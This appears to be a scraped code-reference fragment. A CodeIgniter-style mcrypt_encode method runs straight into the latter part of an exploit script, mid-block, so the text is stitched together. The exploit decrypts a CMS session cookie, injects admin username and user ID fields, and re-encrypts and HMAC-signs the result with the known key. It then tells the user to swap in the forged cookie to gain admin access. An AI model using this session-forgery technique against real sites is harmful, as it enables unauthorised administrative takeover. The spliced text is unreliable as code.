| public mcrypt_encode ( $data, $key ) : string | ||
| return | string | |
public function mcrypt_encode($data, $key)
{
$init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
$init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND);
return $this->_add_cipher_noise($init_vect . mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key);
} _print("Encryption method is xor!");
$method = 'x';
$plain = $_xor;
} else {
show_error("something went wrong.");
}
}
// Unserialize session string in order to create session array.
$session = unserialize($plain);
_print("Current Session Array :");
print_r($session) . PHP_EOL;
// Add extra fields into it
$session['cms_user_name'] = 'admin';
$session['cms_user_id'] = 1;
// Print out payload string.
_print("Payload appended Session Array :");
print_r($session) . PHP_EOL;
// Serialize it
$session = serialize($session);
// Encrypt it with same key.
if ($method === 'm') {
$payload = base64_encode($encryption->mcrypt_encode($session));
}
if ($method === 'x') {
$payload = base64_encode($encryption->_xor_encode($session));
}
// Calculation of hmac to add it end of the encrypted session string.
$payload .= hash_hmac('sha1', $payload, KEY);
_print("New Cookie");
_print($payload);
_print("Use Tamper Data and change cookie then push F5!");
